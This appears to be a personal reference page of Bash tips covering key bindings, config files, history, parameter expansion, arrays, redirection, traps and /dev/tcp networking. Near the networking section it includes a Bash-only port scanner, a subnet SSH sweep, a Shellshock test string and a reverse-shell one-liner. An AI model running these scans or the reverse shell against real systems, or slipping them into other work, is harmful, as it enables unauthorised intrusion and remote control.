Bash You Don’t Want To Use

In September 2014 a very serious undocumented feature in Bash, now known as Shellshock, was published. Here’s how to check for it.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If this prints the word "vulnerable", then your Bash is vulnerable. If not, it isn’t. Patches cleanly fix this, but it’s a big problem for CGI-enabled web servers and DHCP clients.

Bash User Interactive Keys

I often forget useful Bash keyboard tricks because I have other ways of doing things. Here are some worth remembering.

Immediate Special Functionality

Here are some key bindings I’m trying to get better at using.


^ls^rm - Run the previous command with rm substituted for ls. The final delimiter is optional.


[M]-. - Immediately substitute the last argument of the previous command.


[M]-b - Back one word.


[M]-f - Forward one word.


[M]-d - Delete a word. Any leading spaces the cursor may be on get deleted too. Words are letters and numbers only, no symbols.


[M]-t - Toggles the order of two words - "A B" becomes "B A" when the cursor is between them.


[C]-t - Toggles the order of two letters, the one at the cursor position and the one immediately before it.


[M]-u - Turns a word into upper case - "sample" becomes "SAMPLE".


[M]-l - Turns a word into lower case - "SAMPLE" becomes "sample".


[M]-c - Capitalizes a word - "SAMPLE" or "sample" becomes "Sample".


[C]-x * - Immediately substitute the expansion of a star glob.


[C]-x g - Propose the results of expanding a star glob.


[C]-] - Jump forward to the next occurrence of the next typed character.


[M]-[C]-] - Jump backward to the previous occurrence of the next typed character. Note this is still the right bracket even when moving left. Can also type ESC, then [C]-], then the character to find.


[C]-_ - Undo the last command line edit operation. (Shift is used.)


[M]-# - Comment out the line and enter it. Handy for preserving the visibility of a command without executing it.


[C]-f - Cursor forward one character. Not too useful if you have arrows.


[C]-b - Cursor back one character. Not too useful if you have arrows.


[C]-v - Rather than doing a special thing when a special key is pressed, print the special key’s escape code.


[C]-w - Delete the word before the cursor (not including the cursor). Space delimited.


[M]-<n> <char> - The character replicated n times.

Here’s some I know well, but will include for others.


[C]-a - Go to beginning of line.


[C]-c - Break the execution of the running process. Technically generates a SIGINT.


[C]-d - Same as the builtin exit which quits Bash. Must be at the start of an empty line!


[C]-e - Go to end of line.


[C]-g - Classic use is a beep but I use it as my screen meta key.


[C]-h - Same as backspace. Maybe useful if you don’t have a backspace key or it’s not working.


[C]-j - New line (NL, aka line feed). Same as enter in Bash. This is the proper Unix newline (0A, \n).


[C]-k - Deletes (kills) everything from the cursor position to the end of the line, including the character at the cursor position.


[C]-l - Same as the builtin clear which clears the screen.


[C]-m - Carriage return (CR). Same as enter in Bash though not the correct Unix newline.


[C]-n - Next command in history. You need to have gone back with [C]-p first for this to have any effect.


[C]-p - Previous command in command history.


[C]-q - Resumes output. Can be critical if you accidentally pressed [C]-s and the terminal seems locked up.


[C]-r - Reverse search through the history. Type [C]-r and then some of the text included in the command you’d like to revisit. Keep pressing [C]-r if there are unwanted matching commands more recent than the one you want. When you’ve found the one you want, hit enter.


[C]-s - Stops output. Can be used to read things scrolling by quickly.


[C]-u - Deletes (kills) everything from the cursor position back to the beginning of the line, excluding the character at the cursor position.

Special Meaning Syntax


!$ - Substitute the last argument of the previous command.


!* - Substitute all arguments of the previous command.


!! - Substitute the last command (I use up arrow for normal cases).


This has a lot of sensible tips about organizing and running more complex Bash programs.


Run Bash with bash -x to have it print out everything it’s doing. To localize this effect, use set -x just before the code you want to examine and use set +x where you want that to stop.

I often do things like this.

echo "About to do this:"
echo ${CMD}
read -p "If this doesn't look right, press CTRL-C."
eval ${CMD}

Bash’s Crazy Config Files

In the /etc directory are some default Bash config files that affect Bash’s behavior unless countermanded by user-set config files.

Other people have also tried to explain this.


/etc/profile

This file is read and executed at initial login time by all users. I think that subshells ignore it. It also seems to get executed before the xterm window is ready, so output from this script, like a message of the day, doesn’t seem to make it to the screen. It will make it to a log file however. This means that if you want to print a message or set the PS1 prompt variable, it won’t carry over when X subsequently opens up an xterm.


/etc/bashrc

This file is read and executed by all Bash initialization activity such as logging in by any user from anywhere and any subshell that the user spawns. I think that this is referred to in a lot of unexpected places too, so it’s not smart to have anything too busy here. This file might actually be a fake; it isn’t mentioned in any documentation. It seems to be called from ${HOME}/.bashrc, so if that file doesn’t exist, then this one is useless. It’s not really a global catch-all if users can pull the reference from their ${HOME}/.bashrc, so I don’t really see the point of it. Although it would take up a trivial amount of extra disk space, a better way would be to put the things you wanted here into a skeleton used to create ${HOME}/.bashrc files when you create new users.

I add plenty of personal optimization to my .bashrc but one of the more popular tricks is my prompt which keeps the user apprised of the exit status of the previous command. Like this.

:-> [host][~]$ true
:-> [host][~]$ false
:-< [host][~]$ true
:-> [host][~]$
My Happy Prompt
# xed- Fancy prompt      :->
BLU="\[\033[0;34m\]" #Blue.
LGY="\[\033[0;37m\]" #Light Gray.
LGR="\[\033[1;32m\]" #Light Green.
LBU="\[\033[1;34m\]" #Light Blue.
LCY="\[\033[1;36m\]" #Light Cyan.
YEL="\[\033[1;33m\]" #Yellow.
WHT="\[\033[1;37m\]" #White.
RED="\[\033[0;31m\]" #Red.
OFF="\[\033[0m\]"    #None.
LASTSTAT=":-\$(if [ \$? -eq 0 ] ; then echo -n '>' ; else echo -n '<' ; fi )"
if [[ "$UID" > "0" ]];
then # Normal User
    PS1="${LASTSTAT}${BLU}[${LGR}\H${OFF}${BLU}][${LCY}\w${BLU}]${LBU}\$${OFF} "
else # Root UID=0
    PS1="${LASTSTAT}${BLU}[${RED}\H${OFF}${BLU}][${LCY}\w${BLU}]${LBU}${SD}#${OFF} "
fi

I won’t name anyone but I know some csh user who does not like tildes in prompts for home directories. The Bash answer is to use command substitution like this.

export PS1='[\h]$(pwd) $ '


${HOME}/.bash_profile

This is the user’s chance to redo the initial login settings established by /etc/profile, if there is one. This runs once only, at login. If the user wants something run every time he logs in, like a backup or something, this is a good place for it. Be aware that this file has no less than two functionally equivalent synonyms, 1.) ${HOME}/.bash_login and 2.) ${HOME}/.profile, which are searched for in that order.


${HOME}/.bashrc

This file is executed for all the owning user’s new shell activity. This means that these commands will be reissued for each and every subsequent subshell. This is where users can put custom aliases that should be very persistent. This file seems to execute quite frequently - 3 times on initial login for me and once for each subshell.


One of the extremely important features of the shell which elevates command line work from a nightmare to a joy is command history. If you’ve typed something complicated, you don’t want to type it again. Using the up arrow to revisit previous commands is the normal thing to do. Also typing history <N> will show you what is in the history for the last N lines. Ctrl-R will allow you to start typing something that will be matched with a command that is in history; keep pressing Ctrl-R until you get the matching command you want.

  • history -c - clear all entries, but this leaves the clearing command itself in the history.

  • history -c && history -d $HISTCMD - clear all entries and tidy up the command that cleared them.

  • history -d 503 - delete the history at line 503 (check with history, no arguments)

  • set +o history - Turn OFF history recording. Use set -o history to turn it back ON. Also unset HISTFILE may be better if you want it off permanently.

  • export HISTCONTROL=ignoredups:ignorespace - Don’t bother with…

    • Wasting history lines on commands that are run multiple times in a row.

    • Saving a line that starts with a space. This can be handy to selectively leave certain commands, perhaps containing sensitive passwords, out of the history.

  • export HISTTIMEFORMAT='%Y-%m-%d ' - Turn on date recording in history so that the history [N] command will show when the commands were used.

  • export HISTSIZE=5000 - Sets the number of lines to remember. Setting 0 will prevent history from being written. Setting a negative number means the history is never truncated and will grow until resource limits are hit. Note also HISTFILESIZE which is very similar but governs disk usage while HISTSIZE limits what can be in memory.

Note that there’s a decent man page for the GNU history C library that provides some interesting insight: man 3 history. Also see Bash’s built-in help history.



When did this happen? I just learned that Bash has a += append operator. This is super useful! But don’t use it with /bin/sh since it’s a fancy feature of Bash.

$ typeset -i X=3
$ X+=5
$ echo ${X}
8
$ Y=3
$ Y+=5
$ echo ${Y}
35

$ typeset -i N=0; time while ((N<1000000)); do N+=1; done
real    0m4.107s
$ typeset -i N=0; time while ((N<1000000)); do N=$((N+1)); done
real    0m5.794s

This is also useful for Bash’s default string types. Here is a demonstration of building a binary number as a bit string.

$ unset B
$ B+=1
$ B+=0
$ B+=1
$ B+=0
$ echo $B
1010

This can be very useful for building big lists of arguments over several lines. This allows for scripts to be neater and to perhaps selectively compose item sets with conditional statements. When creating a string of elements to process, separating by space is typical and often quotes (including a trailing space) are needed.
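Here’s a minimal sketch of the idea; the flag names and paths are made up for illustration.

```shell
# Build up an argument string a piece at a time; note each piece
# carries its own trailing space as a separator.
RSYNCARGS=""
RSYNCARGS+="--recursive "
RSYNCARGS+="--exclude=.git "
if [ -n "${VERBOSE:-}" ]; then
    RSYNCARGS+="--verbose "       # conditionally include a flag
fi
RSYNCARGS+="src/ dest/"
echo rsync ${RSYNCARGS}           # echoed here rather than actually run
```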

Parameter Matching Operators

  • ${variable#pattern} if pattern matches beginning, del shortest part

  • ${variable##pattern} if pattern matches beginning, del longest part

  • ${variable%pattern} if pattern matches end, del shortest part

  • ${variable%%pattern} if pattern matches end, del longest part
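To make the shortest/longest distinction concrete, here is a quick demo (the filename is just an example):

```shell
P="archive.tar.gz"
echo ${P#*.}    # shortest match of *. deleted from front -> tar.gz
echo ${P##*.}   # longest match deleted from front        -> gz
echo ${P%.*}    # shortest match of .* deleted from end   -> archive.tar
echo ${P%%.*}   # longest match deleted from end          -> archive
```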

Here’s an example - this renames a big long list of files x001.gif, x002.gif, etc. to b001.gif, b002.gif, b003.gif, etc.

for ce in x???.gif; do mv $ce b${ce#x}; done

Another example - this converts a series of tif images with the names tb01.tif, tb02.tif, tbwhatever.tif to tb01.gif, tb02.gif, etc. It also changes the images to 15 color grayscale.

[~/xfile/project/pix]$ for ce in tb*.tif; \
> do convert -colorspace GRAY -colors 15 $ce ${ce%tif}gif; done

Default Substitution

One thing that is fairly common in scripts and quite useful is default substitution. The normal case is to supply a value to be used if the variable you refer to is null or unset.

echo ${1:-/default/path/instead}

Similarly, the := does much the same thing except that if the variable is unset, it is henceforth defined with the alternate value. This does not work with $1 and $$ and other fancy things. Keep it simple.

The previous example is in an echo statement. It is common, however, to need a default applied as a complete operation unto itself. This is, as far as I can tell, the only really sensible use of Bash’s built in : (colon) command. This command has pretty much no effect (to find it search for No effect in Bash’s man page). It does expand arguments and that’s why it is useful for replacing the echo (above example) if you don’t actually want an echo.

:-> $ : ${A:-wow}
:-> $ echo $A

:-> $ : ${A:=wow}
:-> $ echo $A
wow

The :- will actually work with stuff like $1 because it does not try to change them, just return a different thing. Here is a nice little demo of this and the case/esac statement which can be used to choose which part of a multi-faceted script to run.

function f1 { echo "One" ;}
function f2 { echo "Two" ;}
case ${1:-0} in # If no $1 use 0.
    0) echo "Usage: $0 [0|1|2]" ;;
    1) f1;; 2) f2;;
    *) echo "Invalid";;
esac

If you must have input, the :? will just spit out the pattern text to stderr. A generic message is used if you don’t provide one. Interestingly, you don’t actually need the : on this one.

:-> $ echo ${WTF}

:-> $ echo ${WTF?}
-bash: WTF: parameter null or not set
:-< $

Note the exit codes are different.

Finally, there is the weird case where if there is something, you want it to definitely be something else. If there is nothing, leave it alone as nothing. This is :+.
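A tiny demo of :+ (the variable name is arbitrary):

```shell
unset V
echo "[${V:+substitute}]"   # V is unset, so nothing: []
V=anything
echo "[${V:+substitute}]"   # V is set, so: [substitute]
```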

Substring Expansion

Not to be confused with the :- default substitution, the : can also be used to pick out substrings.

$ N=1234567890
$ echo ${N:3}
4567890
$ echo ${N:3:4}
4567
$ echo ${N: -2}
90
$ echo ${N: -5: -2}
678
if [ "${TERM::6}" == screen ]; then echo "In a screen"; else echo "NOT in a screen";fi

Note the spaces between the colon and the dash. This is essential to avoid having Bash interpret these as default substitution (see above).

Here’s a useful application.

$ PARTITION=/dev/sdb1
$ DRIVE=${PARTITION::-1}
$ PARTNUM=${PARTITION: -1}
$ echo "Drive:${DRIVE} Partition:${PARTNUM}"
Drive:/dev/sdb Partition:1

Changing Case With Expansion

You can also change case.

$ F="BIG & little |"; echo ${F,,} ${F,} ${F^^} ${F^}
big & little | bIG & little | BIG & LITTLE | BIG & little |

This operation can work on each member of an array automatically. Using this and substituting out spaces, you can probably make something that could go convert "some messy filename" into "SomeMessyFilename".
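Here is one sketch of that filename idea, assuming the name contains no glob characters:

```shell
F="some messy filename"
A=( ${F} )                    # word-split the name into an array
J=$(printf '%s' "${A[@]^}")   # capitalize each element, join with no separator
echo ${J}                     # SomeMessyFilename
```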

Arithmetic Expansion

I don’t know how long bash has had this, but it wasn’t a useful feature when I learned Bash a long time ago. But these days it is quite handy and elevates Bash to the status of quite a sensible general purpose language. Basically in the distant Unix past one had to use bc and dc and expr to get any kind of arithmetic done, even trivial things like incrementing a variable involved spawning a new shell and casting text strings every time. Now you can pretty much use the (( expression )) syntax and the expression will be evaluated in a pretty sensible way. If you need the expression to stand by itself as a process which produces its own exit code (like the old bc but I’m not sure a new process is actually spawned), then you can do something like this:

if (($RANDOM%2)); then echo Tails; else echo Heads; fi

If you need to produce the result for further consideration, you need to expand the expression like this:

echo $(($RANDOM%6+1)) # 6 sided dice
# Print a random line from a file:
F=file; sed -n "$(($RANDOM%`sed -n $= $F`+1))p" $F

Note that the performance of these operations can be suboptimal. Often spawning new shells for sub commands beats the arithmetic expansion.

$ X=0; time while (( X < 100000 )); do true $((X++)); done
real    0m2.794s
$ X=0; time for X in `seq 100000`; do true; done
real    0m1.176s

Oh and check out this:

$ X=0;time while (( X < 100000 )); do true $(( X++ )); done
real    0m2.875s
$ X=0;time while ((X<100000)); do true $((X++)); done
real    0m2.510s

Normally in Bash, it’s good to help the tokenizer by being explicit about where things are, but in this case, spaces just waste time.


Do the action 10 times concurrently:

for X in `seq 10`; do ( time python & ) ; done

SSH Escaping

Sometimes running complex things over SSH can be very annoying. Here is a complex example that has a redirect and glob and variables which is run in the background on several hosts at the same time.

for H in ${TheHosts[@]}; do
    echo "Processing ${TargetDir} on ${H}..."
    RCMD="${TheScript} ${TargetDir}/*.gz > ${TargetDir}/output.${H}.sdf;"
    RCMD="${RCMD} echo Done with ${H}"
    echo ${RCMD} | ssh ${H} $(</dev/stdin) &
done

For simple things, something like this works:

for H in ${TheHosts[@]}; do echo ${H};\
( time ssh ${H} bzip2 /tmp/zinc/thechosen1s.${H}.sdf & ) ; done


Bash has perfectly good support for Arrays. Search for /^ *Arrays in the man page for complete information.

Bash arrays start indexing at 0 (like C arrays).

This will print out a random file from the current directory:

F=(*);echo ${F[$((RANDOM%${#F[@]}))]}

Here is an example program that copies a large collection of files in a source directory to many different hosts (say in a cluster for processing) such that each host will receive the same number of files (to the extent possible):

# Where are the files coming from:
# What hosts will the files go to:
TheHosts=( c39 c40 c41 c42 c43 c44 c45 c47 c84 c85 c86 c87 c88 )

TheFiles=( ${SourceDir}/* )

NofH=${#TheHosts[@]}
C=0
for F in ${TheFiles[@]}; do
    echo "rsyncorwhatever ${F} ${TheHosts[C]}:/thedir/"
    C=$(( (C+1)%NofH ))
done

Here’s an example of using associative arrays. The trick is that they need to be declared with the -A option or else they’ll just act kind of funny if you’re unlucky enough to not get an explicit error (which happens). Also note that using keys with periods in them was not working for me. There may be a way to do it though.

declare -A D

for F in "${!D[@]}"; do
    wget -O ${F}.zip "${BASE}${D[$F]}"
done

This example will download each zip file and save it based on the key ("", etc). This technique can be handy when sorting out a bunch of badly named things as in the example.

Interestingly enough, ${!D[@]} will make an iterable list of the keys even if the keys have spaces. In other words the for won’t iterate on each word of the keys.
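For example (keys invented for the demo):

```shell
declare -A D
D["key with spaces"]="first"
D["another key"]="second"
for K in "${!D[@]}"; do
    echo "KEY: ${K}"          # each full key is one iteration
done
```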

Mass updating of files that contain similar things that need changing

Here is a method to massively update lots of files that all contain some bad thing and replace it with some good thing. There might be a smoother way to use the sed command, but redirecting to the same file causes the file to simply disappear. Using a tempfile works just fine.

$ for cxe in project??.type ; do cp $cxe temp.temp; \
sed s/bad/good/g temp.temp > $cxe; done

Here, all files that match the project??.type pattern (project01.type, project1a.type, etc) will be copied into the temporary file temp.temp and then they’ll be pulled back out into their real name line by line by sed which will also make substitutions as requested. In this case, it will change all references of "bad" to "good". Don’t forget to erase the residual temp.temp file when you’re done.

Another note - if the text is long, you need quotes around it so bash doesn’t get wise with it: sed s/"This is very bad."/Nowitsgood/g file

If the text has quotes in it:

$ for X in *.html; do cp $X temp.temp;\
> sed s/height=\"66\"/height=\"100\"/ temp.temp > $X; done

Here’s another example-

$ for XXX in *html ; do cp $XXX temp.temp; \
> sed -e "/---/,/---/s/<table>/<table align=center>/" temp.temp > $XXX; done

This only does the substitution after it finds three dashes and only until it finds three more dashes.

Useful Tips For Temp Files And Sudo

This useful program shows how to use proper mktemp temporary files. It also shows how to have commands run as root using sudo if the user running the script is not root.

function help { cat <<EOHELP
A simple script to save S.M.A.R.T. reports for hard drives for use
in later comparisons when units begin to fail. Saves in a filename
based on the serial number of the drive. Specify the drive,
just the "sd[a-z]" part, "/dev/" added automatically.
    $0 sda
EOHELP
}

# How to upgrade to root/sudo if regular user.
SUDO=''; if (( $EUID != 0 )); then SUDO='sudo'; fi

# Use a safe temporary file.
T=$(mktemp --tmpdir=${TDIR} smartstart.tmp.XXXXX)

# Check for such a drive.
if [[ -z "${D}" ]] || ! lsblk --nodeps -o NAME | tail -n+2 | grep "${D}" >/dev/null ; then
    lsblk --nodeps -o NAME | tail -n+2
    exit 1
fi

${SUDO} smartctl -a /dev/${D} > ${T}
#For sensible name, extract unique serial number formatted like this.
#Serial Number:    WD-WCAYW0003385
N=smart-$(sed -n 's/^Serial Number: *\(.*\)$/\1/p' ${T})-$(date '+%Y%m%d')
mv ${T} ${TDIR}/${N}
echo "Report written to ${TDIR}/${N}"


Bash functions are quite useful. They are like bash aliases with the added ability to take parameters. Here’s an example of function use that I have in my ~/.bashrc:

# Break a document into words.
function words { cat $1 | tr ' ' '\n' ; }
function wordscounted { cat $1 | tr ' ' '\n' | sort | uniq -c | sort -n ; }

Another syntax that can be used is this.

words () { cat $1 | tr ' ' '\n' ; }

This is what the set command reports and is probably preferable even though it seems kind of "fake C" to me.

The automatic variable ${FUNCNAME} is available in the body of a function. The parameters supplied when the function was called can be accessed with $@ with $1 being the first one, etc.
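A small illustration of these automatic variables (the function and arguments are made up):

```shell
function demo {
    echo "Function name: ${FUNCNAME}"
    echo "First parameter: $1"
    echo "All parameters: $@"
}
demo alpha beta
```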


How to redirect input from the output of a process
mount | grep sd[a-z]
grep sd[a-z] <(mount)

These both produce the same result.

How to pipe those nasty errors off to Neverneverland.
grep hattrick * 2> /dev/null

This will do the expected thing with stdout, but stderr will head off to the trash.

To get all of the garbage a command spits out to go to a file:

make &> compile.error
How to pipe those handy errors off to another command.
cmd1 2>&1 | cmd2
cdparanoia -Q 2>&1 | grep "no   no"

Many more fancy things can be done with pipes and redirection. It is possible to use the test command (which is related to the [] syntax since [ is an alias for test) to check for where a file descriptor is from. That’s confusing but this makes it clear:

    if [ -t 0 ]; then
        echo Interactive
    else
        echo File descriptor 0 coming from a pipe
    fi

The exec command replaces the current shell process with the specified program, as in exec takeoverthisjob -a args; no new process is spawned and control never returns to the shell. An interesting effect and demonstration of the exec command is seen in the following example.

echo This is being sent to standard output like normal.
exec > logfile.txt
echo This is now being put in the logfile.

Complete Chat Utility Using Named Pipes

Here is a nice example of how to use named pipes to implement a complete private chat system. Imagine your user name is "primary" and your friend’s is "guest".

Put this in /home/primary/.bashrc

This is the named pipe which will contain your messages to the guest. Note that it goes in the guest’s home directory which you’ll need access to. These could go anywhere (somewhere in /tmp might be good).

Put this in /home/guest/.bashrc

Here’s the named pipe which you will look at to see the guest’s chat. After you specify where these will go, you need to create these named pipes once with this command:

$ mkfifo /home/guest/toprimary; mkfifo /home/guest/toguest

Next put these macros into both .bashrc files.

Chat macros
SEDSUB="s/^/ [$USER]: /"
alias listen='/bin/cat </home/guest/to$USER &'
alias chat="/usr/bin/sed -u '$SEDSUB' >$TOPIPE"

Now to chat both parties simply log in (SSH makes the whole thing pretty secure) and each types listen to start listening for the other’s text. And then they type chat to start sending. Now both parties can type and read the other’s typing.

Network Madness

Bash is so foolishly badass that it takes the place of pretty powerful network tools. It provides support for special device files that do things with arbitrary network sockets. The format for these is:

/dev/tcp/<host>/<port>
/dev/udp/<host>/<port>
Note that these aren’t really files. They are very strange file-like interfaces. They only really work with redirection!

As an example, don’t have nmap lying around? This will cleverly scan localhost for open ports using nothing but Bash.

for p in {1..1023}; do (echo >/dev/tcp/localhost/$p) >/dev/null 2>&1 && echo "$p open"; done

Want to just check if an SSH server is up?

:-> $ echo > /dev/tcp/
:-> $ echo > /dev/tcp/
-bash: System error
-bash: /dev/tcp/ Invalid argument
:-< $

Wonder which nodes on your cluster are accepting SSH connections? I found this was more helpful than nmap that whined about insufficient permissions with some simple usages. This one works very quickly but note that the results may not be in order.

for H in /dev/tcp/192.168.1.{1..254}/22; do ((timeout 2 bash -c "(>${H})" 2>/dev/null && echo "SSH UP: ${H}")&); done

Don’t have wget installed? This can work as a complete web client.

exec 3<>/dev/tcp/${}/80
printf "GET / HTTP/1.0\r\n" >&3
#printf "User-Agent: Just Bash\r\n" >&3
printf "\r\n" >&3
while read LINE <&3;do echo $LINE;done

In fact Bash makes reverse shells easy without using netcat on the target system. Run something like this on the remote system and connect to it with netcat or whatever you want locally.

exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

To get an idea of what this can do look at the netcat example in my sound notes.


Often you’ll want to use xargs or GNU Parallel but you may be frightened by the very messy syntax. One way to get around such things is to use a Bash loop to receive the output. Here’s how it would work:

find . | while read N; do md5sum $N; done
find . | while read N; do echo -n $N; md5 $N |sed -n 's/^.* / /p'; done

This will produce a list of checksums for all files in the current directory (and below). This command can be useful to create an inventory of what’s in a directory tree and compare with a directory tree elsewhere to see what has changed.

Here’s an example showing how to avoid xargs:

cat excludes | while read X; do sed -i "/$X/d" mybiglist ; done

This takes a big list of things and a smaller list of things you wish were not in the big list and it looks through each item in the excludes list and removes it in place from the big list (if you’re using GNU sed, otherwise make your own temp file).

Careful when doing this not to find yourself in a subshell which has different variable scopes. For example, something like this could give unintended results.

$ ls | wc -l
$ X="0" ; ls | while read N; do X=$((X+1)); done ; echo ${X}
$ X="0"; F=$(ls); for N in ${F}; do X=$((X+1)); done ; echo ${X}

I’m sure there are even better ways to handle this.

Actually there are different ways, but this technique of piping to while read could be worse. Here’s an example of it being superior.

$ ls -1
c d
$ for N in $(find . -type f); do echo ${N} ; done
./c
d
$ find . -type f | while read N; do echo ${N} ; done
./c d

Here the directory contains a file that includes a space. The for loop has trouble with this treating the space-separated parts of the filename c d as two items.


If you ever need to log something anywhere or do any kind of error monitoring or debugging, check out man logger. This is very handy and it’s universally available as an old school program yet I had never heard of it.

Here’s a clever way to turn off logging selectively.

if [ $DEBUG ] ; then
    logger="echo >/dev/null"
fi

Here’s a nice function that dresses up errors and puts them in stderr if the output is to a terminal.

function error { if [[ -t 2 ]] ; then echo $'\E[31m'"$@"$'\E[0m' ; else echo "$@" ; fi >&2 ; }

Signal Trapping

Trapping a signal is kind of exotic but when it’s a good idea, it’s a good idea. It can be good for things like cleaning up a mess before letting a user cancel an operation with Ctrl-C. For example (more from Dave Taylor):

trap '{ echo "You pressed Ctrl-C"; rm $TEMPFILE ; exit 1; }' INT
for C in 1 2 3 4 5 6 7 8 9 10; do echo $C; sleep 5; done

It can also be used as a timeout enforcer (though there are better ways). Basically spawn another background process that just waits the maximum allowed time and then raises an ALRM signal. Then have the main thing that’s being limited trap for that. Here’s how:

trap '{ echo Too slow. ; exit 1 ; }' SIGALRM
( sleep 5 ; kill -s SIGALRM $$ 2> /dev/null )&
echo "What is the airspeed velocity of an unladen swallow?"
read OK
trap '' SIGALRM
echo "${OK} sounds reasonable to me."

Note that this little script will have problems if the main script exits cleanly and its process ID is taken by something else, something important that should not get a SIGALRM. Just keep that in mind.

To turn off a trap for the INT signal (as used in the previous example):

trap '' INT

Actually this might be better as it should reset to the way things were instead of clearing the traps.

trap - INT

You can check what’s active with just trap by itself.

The special DEBUG signal is always received when a command is entered. This can be useful for tricks like keeping your own log of commands that you run or perhaps a common history from multiple terminals.

trap 'echo $BASH_COMMAND >> /tmp/private_history' DEBUG

General Bash Syntax

Syntax for using the "for" structure.
for variablename [in <list of textstrings or files>]
do
    commands that take advantage of $variablename go here
done
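Filled in with a literal list, that skeleton looks like this:

```shell
for F in alpha beta gamma; do
    echo "Processing ${F}"    # runs once per list item, with $F set each time
done
```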

Here’s another example. This little routine calculates (via exit code) whether a number is a power of 2 or not. Apparently sometimes big search engine companies care about such things.

$ for N in `factor 16384 |cut -d: -f2-`;do if expr $N \!= 2 >/dev/null;\
then break;fi; done; expr $N == 2 >/dev/null
Using Here Documents
# Heredocs are a way to put a lot of arbitrary text into a command's
# standard input stream. Can be good for CGI scripts and the like.
# Here is a sample program that illustrates the idea.
cat > test1 <<HEREDOC
<head><title>Here Doc Fun!</title><head>
HEREDOC
# Note that the heredoc closer needs to be alone on the line.
echo Here are commands that aren\'t part of the heredoc
# Note the quotes in the following. These do what they should.
cat << "EOF_SIMPLE"
I owe $0 to you.
EOF_SIMPLE
cat << EOF_FANCY
This program is called: $0
EOF_FANCY
# Heredocs can send the contents of variables to stdin.
MESSAGE=".sdrawkcab si sihT"
rev <<<${MESSAGE}
# If you see "<<-", the dash means strip literal \t (tabs) from
# the beginning. This is for more natural indentation. I don't use it
# because I hate tab's non-obvious behavior.
# If you need the contents of the heredoc to populate the value of a
# variable, this is a way that seems to work.
MESSAGE=$(cat <<EOMESSAGE
This is a multi-line message that can easily be assigned to a variable
with few quoting worries. You can write whatever you like here and
then later combine it with other components or variables.
EOMESSAGE
)
echo ${MESSAGE}   # Does not preserve line breaks!
echo "${MESSAGE}" # Preserves line breaks. Be aware how you use the variable.
read -d '' CONTENT <<"EOHEREDOC2"
This is probably an even better way to do this.
The -d option is the end of line delimiter. By
setting it to essentially nothing, the input is
not broken by line and the whole body is captured.
EOHEREDOC2
echo "${CONTENT}"


if/then/elif/else/fi constructions
read REP
if [ "${REP}" == "y" ]; then
  echo "Ok, starting...."
elif [ "${REP}" == "m" ]; then
  # This is lame programming but demonstrating that Bash has an `elif`
  echo "Maybe..."
else
  echo "Not doing anything."
fi

It can get very tedious to use and remember the cryptic "CONDITIONAL EXPRESSIONS" (that’s a hint of what to search for in man bash). It can often be nicer to wrap them in pleasantly named functions. Here is a reference of some of these tests in a format that is pleasant to use.

function is_empty { [[ -z "$1" ]] ;}
function is_not_empty { [[ -n "$1" ]] ;}
function is_file { [[ -e "$1" ]] ;} # or -a
function is_readable_file { [[ -r "$1" ]] ;}
function is_writable_file { [[ -w "$1" ]] ;}
function is_executable_file { [[ -x "$1" ]] ;}
function is_regular_file { [[ -f "$1" ]] ;}
function is_non_empty_file { [[ -s "$1" ]] ;}
function is_dir { [[ -d "$1" ]] ;}
function is_symlink { [[ -h "$1" ]] ;} # or -L
function is_set_var { [[ -v "$1" ]] ;} # Send "Name", not "${Val}"
function is_zero_len_string { [[ -z "$1" ]] ;}
function is_non_zero_len_string { [[ -n "$1" ]] ;}
function is_mod_since_read { [[ -N "$1" ]] ;}

Also if you need comparisons consider if [ arg1 OP arg2 ]; then ... fi. OP is one of these.

  • -eq - equal to (also == and maybe even = (see man page CONDITIONAL EXPRESSIONS))

  • -ne - not equal to (also !=, but who wants to use ! in bash?)

  • -lt - less than (also <)

  • -le - less than or equal to

  • -gt - greater than (also >)

  • -ge - greater than or equal to

  • -ot - older than, modification date, args are files

  • -nt - newer than, modification date, args are files
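A quick runnable sketch exercising a numeric test and a file-modification-time test (the temporary files are created just for the demo):

```shell
A=3 B=7
[ "${A}" -lt "${B}" ] && echo "${A} is less than ${B}"

OLD=$(mktemp) ; NEW=$(mktemp)
touch -t 202001010000 "${OLD}"    # Backdate OLD's modification time.
[ "${NEW}" -nt "${OLD}" ] && echo "NEW was modified more recently"
rm "${OLD}" "${NEW}"
```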


The case statement, closed by esac, can be quite useful. Here’s a nice function I wrote that you can put in your .bashrc file which can help you open miscellaneous files. It shows a nice example of how to use case as well as associative arrays and some fancy parameter tricks. The value used in the case statement itself allows the input to ironically be case insensitive — different sense of "case".

function o {
    echo "Opening files..."
    declare -A X # Keyed by executable. Values are lists of files to launch using the key.
    for N in $*; do
        EXT=${N##*.} # Extract extension after last dot.
        N+=" " # Separate. Improve this if you're opening files with spaces in their names.
        case ${EXT,,} in
            jpg|jpeg|png)    X["feh"]+=${N} ;;
            mp4|mpeg|avi)    X["mplayer"]+=${N} ;;
            svg)             X["inkview"]+=${N} ;;
            pdf)             X["xpdf^-rv"]+=${N} ;;
            py|sh|c|cpp|cc)  X["vim^-c^\"set^ai\"^-c^\"set^tw=0\""]+=${N} ;;
            txt)             X["vim"]+=${N} ;;
            *) echo "Can't handle unknown type: ${EXT}" ;;
        esac
    done
    for T in ${!X[@]}; do
        CMD="${T//^/ } ${X[$T]}"
        echo ${CMD}
        eval ${CMD} &
    done
}

You just then need to say something like this to open files.

$ o img1.png photo2.jpg guide.pdf

And all that stuff will be properly opened. Add your own favorite handlers to handle your own favorite extensions.

The only problem I know about so far is that file names with spaces will probably be mishandled. (Of course you don’t use spaces in filenames, right?) It may be possible to handle that by inserting a distinctive custom delimiter at the N+=" " line and then repairing it later when constructing the commands; it would probably be best to also quote-wrap everything if you do that.
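One possible sketch of that repair idea, assuming the ASCII unit separator is safe to use as the stand-in delimiter (SEP, LIST, and FILES are names invented for this illustration):

```shell
SEP=$'\x1f'                    # ASCII "unit separator"; very unlikely in file names.
LIST=""
for N in "my file.png" "other photo.jpg"; do
    LIST+="${N}${SEP}"         # Use SEP where the original code used a plain space.
done
# Later, split on SEP and quote-wrap each recovered name.
IFS="${SEP}" read -ra FILES <<< "${LIST}"
printf '"%s" ' "${FILES[@]}"
echo
```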

Consider "") do_empty_string;; to catch empty lines.
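A minimal runnable illustration of that empty-string catch:

```shell
LINE=""
case "${LINE}" in
    "") echo "empty line";;    # Matches only the empty string.
    *)  echo "got: ${LINE}";;
esac
```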

Simple Argument Handling

To allow specifying multiple items that must each be worked on, the shift built-in is a very typical way to iterate through them.

while [ -n "$*" ]; do
    echo "Processing $1"
    shift
